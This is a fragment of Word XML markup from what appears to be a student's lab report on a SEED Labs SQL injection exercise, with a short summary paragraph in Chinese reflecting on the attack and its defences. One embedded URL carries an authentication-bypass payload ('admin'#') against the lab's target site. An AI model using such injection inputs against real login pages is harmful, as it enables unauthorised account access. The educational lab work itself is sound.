            <wp:extent cx="5274310" cy="16821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3C0C" w14:textId="77777777" w:rsidR="0077015E" w:rsidRDefault="0077015E" w:rsidP="008B6B9E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D5D7AA6" w14:textId="77777777" w:rsidR="0077015E" w:rsidRPr="0077015E" w:rsidRDefault="0077015E" w:rsidP="0077015E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0077015E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>三、实验总结</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16370807" w14:textId="7988C890" w:rsidR="0077015E" w:rsidRPr="0077015E" w:rsidRDefault="0077015E" w:rsidP="0077015E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0077015E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这次实验</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的内容主要是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QL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入攻击。在实验中，我初步了解了基本的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QL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句、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QL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入攻击的基本方法以及其防御措施。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QL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入攻击仍然是基于数据与代码相混合，这其实在之前的实验中有多次体现，让我深刻地意识到其危害性。在这次实验中，遇到的最大困难是在终端采用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url</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令实行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QL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入攻击，至今还未能得到正确结果，我将继续探索此方面的知识。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712D5170" w14:textId="77777777" w:rsidR="0077015E" w:rsidRPr="0077015E" w:rsidRDefault="0077015E" w:rsidP="008B6B9E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="0077015E" w:rsidRPr="00770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F2"/>
    <w:rsid w:val="00101E8D"/>
    <w:rsid w:val="001406F2"/>
    <w:rsid w:val="001C083F"/>
    <w:rsid w:val="002414CA"/>
    <w:rsid w:val="003D672E"/>
    <w:rsid w:val="004260DE"/>
    <w:rsid w:val="006A702A"/>
    <w:rsid w:val="0077015E"/>
    <w:rsid w:val="00814614"/>
    <w:rsid w:val="008B6B9E"/>
    <w:rsid w:val="00905E59"/>
    <w:rsid w:val="009979ED"/>
    <w:rsid w:val="009A3F7A"/>
    <w:rsid w:val="00B36056"/>
    <w:rsid w:val="00BD39A2"/>
    <w:rsid w:val="00BF0794"/>
    <w:rsid w:val="00D16B13"/>
    <w:rsid w:val="00D33D2E"/>
    <w:rsid w:val="00D37927"/>
    <w:rsid w:val="00DE1F7A"/>
    <w:rsid w:val="00E85F85"/>
    <w:rsid w:val="00E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E347"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{1E6DC539-F256-4169-ABEB-496AE71B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="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
        <w:color w:val="000000" w:themeColor="text1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B1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6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seedlabsqlinjection.com/safe_home.php?username=admin'#&amp;Password=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2AC0-E551-449D-85DD-D102B106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dcterms:created xsi:type="dcterms:W3CDTF">2020-09-19T00:54:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-19T11:45:00Z</dcterms:modified>
</cp:coreProperties>
</file>